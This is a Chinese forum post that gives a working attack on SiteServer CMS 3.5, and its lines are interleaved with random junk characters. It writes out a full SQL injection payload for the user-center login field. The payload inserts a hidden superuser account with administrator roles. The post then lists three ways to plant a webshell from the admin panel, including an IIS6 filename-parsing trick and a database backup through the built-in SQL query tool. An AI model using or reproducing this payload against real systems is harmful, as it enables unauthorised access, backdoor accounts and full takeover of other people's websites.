经测试秒杀最新的3.5版1 d2 r1 s. d. [" Z9 `
stieserver官网:www.siteserver.cn% B7 }% u: G& D h6 Z
EXP:7 S6 \; A$ k. H% d' P! |5 @
直接访问UserCenter/login.aspx
, @6 t+ a. j% G- B# u2 c2 z! y用户名处输入:" Y+ L$ P- [3 e0 `
: L$ \% {( N* O) n' l8 a* Y: `
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
a8 T6 j+ m Z9 y" _& w! U密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。( r2 s! F `: V
之后再访问后台SiteServer/login.aspx用插入的用户登陆
/ w6 W& y3 P/ w* Y( V后台拿webshell的三种方法: i9 S& _$ g) D2 J- v3 R$ |
一、
5 i- d3 G( F' X$ p站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
~! a: R, J% |" o' X6 g+ F二、
9 v$ f+ P. O7 x% L2 I5 @成员权限-》添加用户-》用户名为:1.asp3 ?8 s$ t9 c& `) g# Q
http://127.0.0.1/usercenter/
/ S6 w' m& o) f+ n) t1 a用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
. ~9 ~% W' S2 J' _(ps:后台添加用户时不会验证是否含有非法字符)
+ J& @0 ^3 d+ p. C b4 e+ N9 E三、
, Y, F0 f# D. k T$ ?5 A- V系统工具-》实用工具-》机器参数查看
% l: R, |4 A" e0 v) n可以看到数据库类型、名称,WEB路径! J: v( L, ]# @, _2 T* w
系统工具-》数据库工具-》SQL语句查询
& f. M1 x- c- T% u1 ?这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对